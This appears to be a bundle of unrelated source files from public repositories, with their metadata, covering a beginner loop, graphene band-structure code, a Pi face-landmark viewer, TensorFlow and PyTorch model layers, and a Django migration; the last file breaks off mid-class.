/week4/0alfabeto.py
|
441e896fe3fd0dd687d471bcbe919ee01e4b9c82
|
[] |
no_license
|
FelipeMQ/CS1100
|
2b8b81c0ff4bb27f184498a5c8b54410da60c817
|
1c1af3773fde2d696f538c60fd0a91a956a4761b
|
refs/heads/master
| 2020-03-25T00:44:50.335643
| 2017-10-16T13:52:43
| 2017-10-16T13:52:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
alfabeto = "abcdefghijklmggggnñopqrstuvwxyz"
for caracter in alfabeto:
if caracter == 'g':
print('caracter g')
|
[
"randiel.melgarejo@gmc-soft.com"
] |
randiel.melgarejo@gmc-soft.com
|
ea22cbc90ac662f3653b73a10e009a8cd350a45f
|
a012ed6fd7e2ecbbb694260f82c15ab19849774a
|
/scratch.py
|
ebad8251fdd3404b24357592a60fb738023a1c40
|
[] |
no_license
|
dpiponi/nano
|
f059285a8d5adc2aaaef7bdbb4d857b228101925
|
8145a95cb7f6ba7bfe5269bf3d0abd87d5c77444
|
refs/heads/master
| 2020-05-17T15:44:16.976181
| 2018-01-11T21:57:56
| 2018-01-11T21:57:56
| 7,544,583
| 5
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,535
|
py
|
"""
Compute energy levels and band structures for atomic nanostructures
drawn with ASCII art.
"""
# 3eV for graphene
import numpy
import numpy.linalg
import matplotlib.pyplot
import math
import sys
import operator
import units
diagram = r"""
o-o
/ \
o o-o
\ / \
o-o o
/ \ /
o o-o
\ /
o-o
"""
diagram = r"""
o-o
/ \
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
\ /
o-o
"""
diagram = r"""
o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o
"""
diagram = r"""
o-o
/ \
o o
\ /
o-o
"""
diagram = r"""
o-o=o-o=o-o=o-o=o-o=o-o=o-o=o
"""
diagram = r"""
o-o
/ \
o-o o-o
/ \ / \
o-o o-o o-o
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
o-o o-o o-o
"""
diagram = r"""
o-o
/ \
o-o o-o
/ \ / \
o o-o o-o
\ / \ / \
o-o o-o o
\ / \ /
o-o o-o
\ /
o-o
"""
diagram = r"""
A-o
/ \
C-o A
/ \
E-o C
\
E
"""
diagram = r"""
o-o
/ \
A o-A
\ /
o-o
"""
diagram = r"""
o-o
/ \
A o-A
\ /
B-o B
\ /
o-o
"""
diagram = r"""
o-o
/ \
A o-A
\ /
o-o
/ \
B o-B
\ /
o-o
"""
diagram = r"""
A-B
/ \
o o
\ /
A B
"""
diagram = r"""
A-B C-D
/ \ / \
o o-o o
\ / \ /
A B C D
"""
diagram = r"""
A-B C-D E-F G-H
/ \ / \ / \ / \
o o-o o-o o-o o
\ / \ / \ / \ /
A B C D E F G H
"""
diagram = r"""
A-B C-D E-F G-H I-J
/ \ / \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ / \ /
o-o o-o o-o o-o o-o
/ \ / \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ / \ /
A B C D E F G H I J
"""
diagram = r"""
A-B C-D E-F G-H I-J
/ \ / \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ / \ /
A B C D E F G H I J
"""
diagram = r"""
A-B C-D E-F G-H I-J
/ \ / \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ /
o-o o-o o-o o-o
/ \ / \ / \ / \
o o-o o-o o-o o-o o
\ / \ / \ / \ / \ /
A B C D E F G H I J
"""
diagram = r"""
A-B C-D E-F
/ \ / \ / \
o o-o o-o o-o
\ / \ / \ / \
o-o o-o o-o o-o
\ / \ / \ / \
o-o o-o o-o o-o
\ / \ / \ / \
o-o o-o o-o o-o
\ / \ / \ / \
o-o o-o o-o o
\ / \ / \ /
A B C D E F
"""
diagram = r"""
o-o
/ \
A o-A
\ /
o-o
/ \
C o-C
\ /
D-o D
\ /
o-o
"""
diagram = r"""
o-o
/ \
o o-o
\ / \
o-o o
\ /
o-o
"""
diagram = r"""
o-o-o-o
"""
diagram = r"""
o-o
/ \
A o-A
\ /
o-o
/ \
C o-C
\ /
D-o D
\ /
o-o
"""
diagram = r"""
o-o
/ \
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
\ /
o-o
"""
diagram = r"""
A
|
o o
/ \ / \
o o o
| | |
o o o
\ / \ /
A o
"""
diagram = r"""
A B
| |
o o o o o
/ \ / \ / \ / \ / \
o o o o o o
| | | | | |
o o o o o o
\ / \ / \ / \ / \ /
o A o B o
"""
diagram = r"""
A F
/ \
o o-o o-o
\ / \ \
o-o o-o o-o o-o
\ \ / \ \
o-o o-o o-o o-o
\ \ \ / \
o-o o-o o-o o-o
\ / \ / \
o-o o-o o
\ /
A F
"""
diagram = r"""
A-B C
/ \ /
o o-o
\ / \
A B C
"""
diagram = r"""
o-o=o-o=o-o=o-o=o-o=o-o=o-o=o
"""
ZIGZAG1 = r"""
A-B
/ \
o o
\ /
A B
"""
ZIGZAG2 = r"""
A-B C
/ \ /
o o-o
\ / \
A B C
"""
ZIGZAG5 = r"""
A-B C-D E-F
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
A B C D E F
"""
ARMCHAIR1 = r"""
A B
| |
o o
\ /
o
|
o
/ \
A B
"""
ARMCHAIR2 = r"""
A B
| |
o o
\ / \
o o
| |
o o
/ \ /
A B
"""
ARMCHAIR3 = r"""
A B C
| | |
o o o
\ / \ /
o o
| |
o o
/ \ / \
A B C
"""
BEARDED_ZIGZAG2 = r"""
A-B C
/ \ /
o-o o-o
\ / \
A B C
"""
BEARDED_BEARDED5 = r"""
A-B C-D E-F
/ \ / \ / \
o-o o-o o-o o-o
\ / \ / \ /
A B C D E F
"""
INTERFACE = r"""
o-o=o-o=o-o=o-o=o=o-o=o-o=o-o=o
"""
GRID23 = r"""
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
/ \ / \
o o-o o
\ / \ /
o-o o-o
"""
GRID35 = r"""
o-o o-o o-o
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
o-o o-o o-o
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
o-o o-o o-o
/ \ / \ / \
o o-o o-o o
\ / \ / \ /
o-o o-o o-o
\ / \ /
o-o o-o
"""
SIMPLE1 = r"""
A-B
| |
A B
"""
SIMPLE2 = r"""
A-B
| |
o-o
| |
A B
"""
MANY = r"""
A-B-C-D-E-F-G-H-I-J-K-L-M-N-O-P-Q-R-S-T-U-V-W-X-Y-Z-a-b-c-d-e-f
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f
"""
#import console
numpy.set_printoptions(linewidth=200)
def vec(x, y):
"""
Construct 2D numpy integer vector.
This type is used for representing vectors within a nano-ribbon
diagram.
"""
return numpy.array([x, y], dtype = numpy.int32)
bond_types = {
'/' : (1.0, vec(1, -1), vec(-1, 1)),
'\\': (1.0, vec(-1, -1), vec(1, 1)),
'-' : (1.0, vec(0, -1), vec(0, 1)),
'=' : (1.5, vec(0, -1), vec(0, 1)),
'|' : (1.0, vec(-1, 0), vec(1, 0))
}
def parse_diagram(diagram, dimension_hint = None, joins = ''):
"""
Convert diagram into lists of bonds and atoms.
This function attempts to guess whether your diagram is aperiodic,
periodic with one period or periodic with two periods.
It does this using the geometry of the diagram, assuming it
is planar. Sometimes you don't want planar geometry
(eg. for spirals) and you simply want a single period.
In that case, set `dimension_hint` equal to 1. It's a hint
because it'll return an aperiodic structure if that's what
your diagram looks like.
"""
p = diagram.split('\n')
num_atoms = 0
dimension = 0
period0 = None
period1 = None
atoms = {}
bonds = []
orig_map = {}
i = 0
for row in p:
j = 0
for col in row:
if col in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnpqrstuvwxyz':
if col in orig_map:
if col in joins:
orig = orig_map[col]
path = vec(0, 0)
else:
orig = orig_map[col]
d = vec(i-orig[0], j-orig[1])
if dimension_hint == 1 or dimension == 0:
period0 = d
path = vec(1, 0)
dimension = 1
elif dimension == 1:
if (period0==d).all():
path = vec(1, 0)
else:
period1 = d
dimension = 2
path = vec(0, 1)
elif dimension == 2:
if (period0 == d).all():
path = vec(0, 1)
elif (period1 == d).all():
path = vec(1, 0)
elif (period0+period1 == d).all():
path = vec(1, 1)
else:
raise "Unknown period"
atoms[(i, j)] = (path, atoms[orig_map[col]][1])
else:
orig_map[col] = (i, j)
atoms[(i, j)] = (vec(0, 0), num_atoms)
num_atoms += 1
elif col == 'o':
atoms[(i, j)] = (vec(0, 0), num_atoms)
num_atoms += 1
elif col in bond_types:
(hop, src, dst) = bond_types[col]
bonds.append((hop, (i+src[0], j+src[1]), (i+dst[0], j+dst[1])))
j += 1
i += 1
return (num_atoms, dimension, bonds, atoms)
def compute_hamiltonian(num_atoms, atoms, bonds, flux_per_plaquette = 0):
"""
Compute Hamiltonian for given graph.
If it's periodic it computes the Hamiltonian as a polynomial
in the reciprocal lattice vector.
"""
zero = numpy.zeros((num_atoms, num_atoms),
dtype = numpy.complex64)
h_poly = {}
for (w, (i0, j0), (i1, j1)) in bonds:
(phase0, atom0) = atoms[(i0, j0)]
(phase1, atom1) = atoms[(i1, j1)]
exp0 = phase1[0]-phase0[0]
exp1 = phase1[1]-phase0[1]
if not (exp0, exp1) in h_poly:
h_poly[( exp0, exp1)] = numpy.copy(zero)
h_poly[(-exp0, -exp1)] = numpy.copy(zero)
# print "a-a ((",atom0, atom1,"))"
# print (i0,j0),"->",(i1,j1)
plaquettes = 0.5*(i1-i0)*(j0+j1)
# print "plaquettes=",plaquettes
mag_angle = flux_per_plaquette*plaquettes*units.electron_charge/units.hbar
mag_phase = numpy.exp(1j*mag_angle)
# print "area=",area
# print "magangle=",mag_angle
# print "magphase",w,mag_phase
# print "exp0,exp1=",exp0,exp1
h_poly[( exp0, exp1)][atom0, atom1] += w*mag_phase
h_poly[(-exp0, -exp1)][atom1, atom0] += w/mag_phase
# print h_poly
return h_poly
def eval_hamiltonian(num_atoms, h_poly, (phase0, phase1)):
"""
Evaluate the Hamiltonian given as a polynomial for a
particular choice of reciprocal lattice vector.
"""
# print "phase=",(phase0, phase1)
h = numpy.zeros((num_atoms, num_atoms),
dtype = numpy.complex64)
for (exp0, exp1) in h_poly:
# print phase0, phase1, exp0, exp1
h += h_poly[(exp0, exp1)] * phase0**exp0 * phase1**exp1
return h
def eigensystem(mat):
"""
Compute eigenvalues and eigenvectors of matrix with
results sorted in increasing order of eignevalue.
"""
e, v = numpy.linalg.eig(mat)
# `eig` returns complex results but we know all of the
# eigenstates have real energy.
e = numpy.real(e)
items = zip(e, v.T)
items = sorted(items, key = operator.itemgetter(0))
e, v = zip(*items)
return (e, v)
def display_band_structure_1d(num_atoms, h_poly, cycles = 1, phase_offset = 0):
"""
Display band structure on the 1d Brillouin zone.
The following parameters affect only how the result is displayed:
`cycles` is the number of times we wrap one brillouin zone around the
horizontal axis. Simulates the effect of computing bands where the
fundamental domain has been repeated `cycles` times.
`phase_offset` shifts the graph in phase space.
"""
x = []
y = [[] for i in range(num_atoms)]
n = 100*cycles
for k in range(-n/2, n/2):
# for k in range(0, n):
alpha = 2*math.pi*k/n+phase_offset
phase = numpy.exp(alpha*1j)
#h_minus, h_zero, h_plus = compute_hamiltonian(num_atoms, atoms, bonds)
#h = h_minus*phase.conjugate()+h_zero+h_plus*phase
h = eval_hamiltonian(num_atoms, h_poly, (phase, 1))
e, v = eigensystem(h)
#print k,h,e
x.append(alpha)
for i in range(num_atoms):
y[i].append(e[i])
for i in range(num_atoms):
# matplotlib.pyplot.plot(x, y[i])
for cycle in range(0, cycles):
matplotlib.pyplot.plot(x[0:100], y[i][100*cycle:100*(cycle+1)])
# matplotlib.pyplot.show()
def simple_display_energy_levels_0d(diagram, num_atoms, atoms, h_poly):
"""
Display energy levels for 0d nano-structure.
Also show eigenstates.
"""
h = eval_hamiltonian(num_atoms, h_poly, (1, 1))
e, v = eigensystem(h)
print e
matplotlib.pyplot.scatter(num_atoms*[0], e, s = 20, marker = '_')
def display_energy_levels_0d(diagram, num_atoms, atoms, h_poly):
"""
Display energy levels for 0d nano-structure.
Also show eigenstates.
"""
h = eval_hamiltonian(num_atoms, h_poly, (1, 1))
e, v = eigensystem(h)
left = 0
bottom = 0
right = max([len(row) for row in diagram.split('\n')])
top = len(diagram.split('\n'))
plot_rows = numpy.ceil(math.sqrt(num_atoms+1))
plot_cols = plot_rows
for i in range(num_atoms):
matplotlib.pyplot.subplot(plot_rows, plot_cols, i+1, axisbg="#000000")
y = [atom[0] for atom in atoms]
x = [atom[1] for atom in atoms]
c = numpy.abs(v[i]*v[i])
matplotlib.pyplot.title('E = %f' % numpy.real(e[i]), fontsize = 10)
norm = matplotlib.colors.Normalize(vmin = min(c),
vmax = max(0.0001, max(c)))
#x = [0,0,1,1]
#y = [0,1,0,1]
#c = [1,2,3,4]
matplotlib.pyplot.hexbin(x, y, C = c,
gridsize = (right-left, top-bottom),
extent = (left, right, bottom, top),
cmap = matplotlib.pyplot.get_cmap("gray"),
norm = norm
)
matplotlib.pyplot.subplot(plot_rows, plot_cols, num_atoms+1)
matplotlib.pyplot.scatter(num_atoms*[0], e, s = 0.1)
def main():
#diagram = BEARDED_ZIGZAG2
#diagram = ZIGZAG2
#diagram = BEARDED_BEARDED5
diagram = MANY
b = 0#0.033*math.pi/2/4
num_atoms, dimension, bonds, atoms = parse_diagram(diagram)
print "dimension=", dimension
if dimension==2:
if 0:
n = 100
x = numpy.zeros((n, n), dtype = numpy.float64)
y = numpy.zeros((num_atoms, n, n), dtype = numpy.float64)
for k0 in range(-n/2, n/2):
for k1 in range(-n/2, n/2):
alpha0 = 2*math.pi*k0/n
alpha1 = 2*math.pi*k1/n
phase0 = numpy.exp(alpha0*1j)
phase1 = numpy.exp(alpha1*1j)
h_minus, h_zero, h_plus = compute_hamiltonian(num_atoms, atoms, bonds)
h = h_minus*phase.conjugate()+h_zero+h_plus*phase
e, v = eigensystem(h)
x.append(alpha)
for i in range(num_atoms):
y[i].append(e[i])
for i in range(num_atoms):
matplotlib.pyplot.plot(x, y[i], lod = True)
matplotlib.pyplot.show()
elif dimension == 1:
h_poly = compute_hamiltonian(num_atoms, atoms, bonds, b)
h = eval_hamiltonian(num_atoms, h_poly, (1, 1))
# print h
#sys.exit(1)
display_band_structure_1d(num_atoms, h_poly)
elif dimension==0:
h_poly = compute_hamiltonian(num_atoms, atoms, bonds)
display_energy_levels_0d(diagram, num_atoms, atoms, h_poly)
if __name__ == "__main__":
main()
|
[
"dpiponi@gmail.com"
] |
dpiponi@gmail.com
|
7e812132e7cf725bce5dd9ec1126147adaf1cb97
|
94a766caa58ce5a9619bc7f99c6dceb961211b2a
|
/pi-face-recognition/dots.py
|
10b52a02295afca465a2b0aacd21961c2746b47b
|
[] |
no_license
|
n-nicholas-s/Toddler-Companion-Bot
|
90976294f08fceadfefbd2382fba6e8c048a3db1
|
81c8f4dc3ee5328ad5986e36b642520d2d1d1225
|
refs/heads/main
| 2023-02-27T08:33:58.554148
| 2021-02-09T10:37:19
| 2021-02-09T10:37:19
| 311,227,832
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,334
|
py
|
#Import required modules
from imutils.video import VideoStream
import imutils
import cv2
import dlib
import time
vs = VideoStream(usePiCamera=True).start()
time.sleep(2.0)
#Set up some required objects
video_capture = cv2.VideoCapture(0) #Webcam object
detector = dlib.get_frontal_face_detector() #Face detector
predictor = dlib.shape_predictor("/home/pi/pi-face-recognition/Predict/shape_predictor_68_face_landmarks.dat") #Landmark identifier. Set the filename to whatever you named the downloaded file
while True:
frame = vs.read()
frame = imutils.resize(frame, width=500)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
clahe_image = clahe.apply(gray)
detections = detector(clahe_image, 1) #Detect the faces in the image
for k,d in enumerate(detections): #For each detected face
shape = predictor(clahe_image, d) #Get coordinates
for i in range(1,68): #There are 68 landmark points on each face
cv2.circle(frame, (shape.part(i).x, shape.part(i).y), 1, (0,0,255), thickness=2) #For each point, draw a red circle with thickness2 on the original frame
cv2.imshow("image", frame) #Display the frame
if cv2.waitKey(1) & 0xFF == ord('q'): #Exit program when the user presses 'q'
break
|
[
"noreply@github.com"
] |
n-nicholas-s.noreply@github.com
|
269973bf925d19675fed0e0eda03f5b215389c27
|
de86f9f9dd620212c96fc3bbc28bdbc7432aa237
|
/lib/Cond_Ex.py
|
bbe7a482982a63c49b59bf18cc8400242b9fd48e
|
[] |
no_license
|
yomhub/Tensorflow_research
|
235fa5513abeea64e44291e6705fb136cf108af4
|
2f8102039168ade5481745e4aa59c7e6a0cba59b
|
refs/heads/master
| 2022-11-24T05:08:11.009741
| 2020-06-14T01:21:54
| 2020-06-14T01:21:54
| 280,804,212
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,421
|
py
|
# utf-8
# this module for Conditional Spatial Expansion
# based on paper
# Towards Robust Curve Text Detection With Conditional Spatial Expansion
import os, sys
import tensorflow as tf
from tensorflow.keras import layers
import numpy as np
class Cond_Pred(layers.Layer):
"""
X: input feature (chs,)
Y: possibility of direction (5,)
[button,right,left,top,stable]->BRLTS
Ho: output hidden state TO BRLT, (4,1)
Hi: input hidden state FROM CENTER and BRLT, (1+4,1)
Direction: BRLT case = 4
"""
def __init__(self, x_chs=4,direction=4):
super(Cond_Pred, self).__init__()
rd_init = tf.random_normal_initializer()
z_init = tf.zeros_initializer()
self.direction = direction
self.wc = tf.Variable(initial_value=rd_init(
shape=(direction, x_chs+5*direction+20),
dtype='float32'),
trainable=True)
self.bc = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# W and B for gate value in BRLT
self.wgci = tf.Variable(initial_value=rd_init(
shape=(direction, x_chs+5*direction+20),
dtype='float32'),
trainable=True)
self.bgci = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# W and B for current g in BRLT
self.wgcur = tf.Variable(initial_value=rd_init(
shape=(direction, x_chs+5*direction+20),
dtype='float32'),
trainable=True)
self.bgcur = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# W and B for output gate in BRLT
self.wgout = tf.Variable(initial_value=rd_init(
shape=(direction, x_chs+5*direction+20),
dtype='float32'),
trainable=True)
self.bgout = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# B for output H
self.bhout = tf.Variable(initial_value=z_init(
shape=(direction, 1),
dtype='float32'),
trainable=True)
# W and B for Y in CENTER and BRLT
# convert c (self.direction,1) to (5,1)
self.wyout = tf.Variable(initial_value=rd_init(
shape=(5, direction),
dtype='float32'),
trainable=True)
self.byout = tf.Variable(initial_value=z_init(
shape=(5, 1),
dtype='float32'),
trainable=True)
# self.cin = tf.Variable(initial_value=z_init(
# shape=(4, direction),
# dtype='float32'),
# trainable=True)
def call(self, inputs):
"""
Inputs
Xin: input feature (chs,1)
Hin = (hcenter,hb,hr,hl,ht), shape (5,self.direction)
Cin = (cbin,crin,clin,ctin), shape (4,self.direction)
Yin = (yb,yr,yl,yt) shape (4,5)
Hout shape: (self.direction)
Y possibility in direction (center,button,right,left,top), shape: (5)
Outputs
Yout = (5,1)
Hout = (self.direction,1)
Cout = (self.direction,self.direction)
"""
xin, yin, hin, cin = inputs
assert(hin.shape==(5,self.direction))
assert(cin.shape==(4,self.direction))
# s shape (chx+5*self.direction+4*5, 1)
s = tf.concat([
tf.reshape(xin,[-1]),
tf.reshape(hin,[-1]),
tf.reshape(yin,[-1]),
],
0)
s = tf.reshape(s,[-1,1])
# current candidate state, shape (self.direction,1)
cur_c = tf.tanh(tf.matmul(self.wc,s)+self.bc)
# gcin, shape (self.direction,1)
gcin = tf.sigmoid(tf.matmul(self.wgci,s)+self.bgci)
tmp = tf.zeros(cur_c.shape)
for i in range(gcin.shape[0]):
tmp += gcin[i]*tf.reduce_sum(cin[i])
# gcur shape (self.direction,1)
gcur = tf.sigmoid(tf.matmul(self.wgcur,s)+self.bgcur)
# c shape same as gcur (self.direction,self.direction)
c = tf.keras.utils.normalize(tmp+(gcur*cur_c))
# gout shape (self.direction,1)
gout = tf.sigmoid(tf.matmul(self.wgout,s)+self.bgout)
# hout shape (self.direction,1)
hout = tf.tanh(c)*gout+self.bhout
y = tf.nn.softmax(tf.matmul(self.wyout,c)+self.byout)
return y,hout,c
@tf.function
def _roi_loss():
pass
class CSE(tf.keras.Model):
def __init__(self,
feature_layer_name='vgg16',
proposal_window_size=[3,3],
max_feature_size=[30,30]
):
super(CSE, self).__init__()
# self.name='Faster_RCNN'
self.pw_size=proposal_window_size
self._predictions={}
self._loss_function=_roi_loss()
if(feature_layer_name=='vgg16'):
self.feature_layer_name=feature_layer_name
self.cond_pred_layer=Cond_Pred(x_chs=512)
elif(feature_layer_name.lower()=='resnet'):
self.feature_layer_name='resnet'
else:
self.feature_layer_name='vgg16'
if(type(max_feature_size)==list):
self.max_feature_size=max_feature_size
else:
self.max_feature_size=[int(max_feature_size),int(max_feature_size)]
def build(self,
input_shape,
):
if(self.feature_layer_name=='resnet'):
rn=tf.keras.applications.ResNet101V2()
self.feature_model = tf.keras.models.Sequential([
# vgg16.get_layer("input_1"),
rn.get_layer("conv1_pad"), rn.get_layer("conv1_conv"), rn.get_layer("pool1_pad"), rn.get_layer("pool1_pool"),
rn.get_layer("block2_conv1"), rn.get_layer("block2_conv2"), rn.get_layer("block2_pool"),
rn.get_layer("block3_conv1"), rn.get_layer("block3_conv2"), rn.get_layer("block3_conv3"),
rn.get_layer("block3_pool"),
rn.get_layer("block4_conv1"), rn.get_layer("block4_conv2"), rn.get_layer("block4_conv3"),
rn.get_layer("block4_pool"),
rn.get_layer("block5_conv1"), rn.get_layer("block5_conv2"), rn.get_layer("block5_conv3"),
rn.get_layer("block5_pool"),
],
name=self.feature_layer_name
)
else:
# default VGG16
vgg16=tf.keras.applications.VGG16(weights='imagenet', include_top=False)
self.feature_model = tf.keras.models.Sequential([
# tf.keras.Input((1024,1024,3)),
# vgg16.get_layer("input_1"),
# Original size
vgg16.get_layer("block1_conv1"), vgg16.get_layer("block1_conv2"), vgg16.get_layer("block1_pool"),
# Original size / 2
vgg16.get_layer("block2_conv1"), vgg16.get_layer("block2_conv2"), vgg16.get_layer("block2_pool"),
# Original size / 4
vgg16.get_layer("block3_conv1"), vgg16.get_layer("block3_conv2"), vgg16.get_layer("block3_conv3"),
# Original size / 4
vgg16.get_layer("block3_pool"),
# Original size / 8
vgg16.get_layer("block4_conv1"), vgg16.get_layer("block4_conv2"), vgg16.get_layer("block4_conv3"),
# Original size / 8
vgg16.get_layer("block4_pool"),
# Original size / 16
vgg16.get_layer("block5_conv1"), vgg16.get_layer("block5_conv2"), vgg16.get_layer("block5_conv3"),
# Original size / 16
# vgg16.get_layer("block5_pool"),
# Original size / 32
],
name=self.feature_layer_name
)
def call(self,inputs):
"""
Features generator->Conditional Spatial Expansion
input: image
"""
feature = self.feature_model(inputs)
# for bach in
return feature
if __name__ == "__main__":
# test_Cond_Pred = Cond_Pred()
# inp=[
# tf.zeros((4,1)),
# tf.zeros((4,5)),
# tf.zeros((5,4)),
# tf.zeros((4,4)),
# ]
# y,hout=test_Cond_Pred(inp)
test_model = CSE()
# RGB wth 256*256
inp=tf.zeros((1,256,256,3))
y = test_model(inp)
print(y.shape)
pass
|
[
"yom@yomhub.com"
] |
yom@yomhub.com
|
7571ab18bd773849dcf06b2496371d53089e95ab
|
38d86e192292e46674a58bec9e6fa1391255b10f
|
/tests/test_project/migrations/0005_organizationradiussettings.py
|
ec1bf6a6e0b6e322d42ca96ff1376ba8e477f972
|
[
"Apache-2.0",
"CC-BY-SA-4.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
openwisp/openwisp-utils
|
b8e44def6dbe9193201c89a77451da15f485c411
|
242afc8b1aa70c4691fd5b43e9ce1a3ca9eb8700
|
refs/heads/master
| 2023-08-02T11:15:42.529346
| 2023-07-26T17:21:17
| 2023-07-26T17:21:17
| 95,099,346
| 85
| 100
|
BSD-3-Clause
| 2023-09-08T13:53:57
| 2017-06-22T09:35:55
|
Python
|
UTF-8
|
Python
| false
| false
| 2,348
|
py
|
# Generated by Django 3.2.19 on 2023-06-24 15:15
from django.db import migrations, models
import openwisp_utils.fields
class Migration(migrations.Migration):
dependencies = [
('test_project', '0004_sheft_data'),
]
operations = [
migrations.CreateModel(
name='OrganizationRadiusSettings',
fields=[
(
'id',
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID',
),
),
(
'is_active',
openwisp_utils.fields.FallbackBooleanChoiceField(
blank=True, default=None, fallback=False, null=True
),
),
(
'is_first_name_required',
openwisp_utils.fields.FallbackCharChoiceField(
blank=True,
choices=[
('disabled', 'Disabled'),
('allowed', 'Allowed'),
('mandatory', 'Mandatory'),
],
fallback='disabled',
max_length=32,
null=True,
),
),
(
'greeting_text',
openwisp_utils.fields.FallbackCharField(
blank=True,
fallback='Welcome to OpenWISP!',
max_length=200,
null=True,
),
),
(
'password_reset_url',
openwisp_utils.fields.FallbackURLField(
blank=True,
fallback='http://localhost:8000/admin/password_change/',
null=True,
),
),
(
'extra_config',
openwisp_utils.fields.FallbackTextField(
blank=True, fallback='no data', max_length=200, null=True
),
),
],
),
]
|
[
"noreply@github.com"
] |
openwisp.noreply@github.com
|
263e646a2a64012dac02f0cf6f4926dfa2bc0eb6
|
de28880dd1c46d0ee2def7e46066d12185fc9a4b
|
/midinet/model.py
|
742bcb8e483d1578aa2f56628c35106154bffb80
|
[] |
no_license
|
frederictamagnan/PredictDrumFillsInNativeInstrumentsSoundPack
|
c3712987352a152edf91e893e8af1b23fd17f495
|
2a19d43d5c153340f0a7a50e7314c4763a6089a4
|
refs/heads/master
| 2020-04-10T04:16:11.417914
| 2019-04-28T16:18:51
| 2019-04-28T16:18:51
| 160,793,133
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,809
|
py
|
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import torch.nn.functional as F
import torch.optim as optim
import ipdb
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from ops import *
class sample_generator(nn.Module):
def __init__(self):
super(sample_generator, self).__init__()
self.gf_dim = 64
# self.y_dim = 13
self.n_channel = 256
pitch_range=9
self.h1 = nn.ConvTranspose2d(in_channels=144, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h2 = nn.ConvTranspose2d(in_channels=25, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h3 = nn.ConvTranspose2d(in_channels=25, out_channels=pitch_range, kernel_size=(2,1), stride=(2,2))
self.h4 = nn.ConvTranspose2d(in_channels=25, out_channels=1, kernel_size=(1,pitch_range), stride=(1,2))
self.h0_prev = nn.Conv2d(in_channels=1, out_channels=16, kernel_size=(1,pitch_range), stride=(1,2))
self.h1_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.h2_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.h3_prev = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=(2,1), stride=(2,2))
self.linear1 = nn.Linear(100,1024*2)
self.linear2 = nn.Linear(1024*2,self.gf_dim*2*2*1)
def forward(self, z, prev_x ,batch_size,pitch_range):
# h3_prev = F.leaky_relu(self.batch_nor_256(self.h0_prev(prev_x)),0.2)
h0_prev = lrelu(batch_norm_2d_cpu(self.h0_prev(prev_x)),0.2) #[72, 16, 16, 1]
# print(h0_prev.size())
h1_prev = lrelu(batch_norm_2d_cpu(self.h1_prev(h0_prev)),0.2) #[72, 16, 8, 1]
h2_prev = lrelu(batch_norm_2d_cpu(self.h2_prev(h1_prev)),0.2) #[72, 16, 4, 1]
h3_prev = lrelu(batch_norm_2d_cpu(self.h3_prev(h2_prev)),0.2) #[72, 16, 2, 1])
# yb = y.view(batch_size, self.y_dim, 1, 1) #(72,13,1,1)
# z = torch.cat((z,y),1) #(72,113)
h0 = F.relu(batch_norm_1d_cpu(self.linear1(z))) #(72,1024)
# h0 = torch.cat((h0,y),1) #(72,1037)
h1 = F.relu(batch_norm_1d_cpu(self.linear2(h0))) #(72, 256)
h1 = h1.view(batch_size, self.gf_dim * 2, 2, 1) #(72,128,2,1)
# h1 = conv_cond_concat(h1,yb) #(b,141,2,1)
h1 = conv_prev_concat(h1,h3_prev) #(72, 157, 2, 1)
h2 = F.relu(batch_norm_2d_cpu(self.h1(h1))) #(72, 128, 4, 1)
# h2 = conv_cond_concat(h2,yb) #([72, 141, 4, 1])
h2 = conv_prev_concat(h2,h2_prev) #([72, 157, 4, 1])
h3 = F.relu(batch_norm_2d_cpu(self.h2(h2))) #([72, 128, 8, 1])
# h3 = conv_cond_concat(h3,yb) #([72, 141, 8, 1])
h3 = conv_prev_concat(h3,h1_prev) #([72, 157, 8, 1])
h4 = F.relu(batch_norm_2d_cpu(self.h3(h3))) #([72, 128, 16, 1])
# h4 = conv_cond_concat(h4,yb) #([72, 141, 16, 1])
h4 = conv_prev_concat(h4,h0_prev) #([72, 157, 16, 1])
g_x = torch.sigmoid(self.h4(h4)) #([72, 1, 16, 128])
return g_x
class generator(nn.Module):
def __init__(self,pitch_range):
super(generator, self).__init__()
self.gf_dim = 64
# self.y_dim = 13
self.n_channel = 256
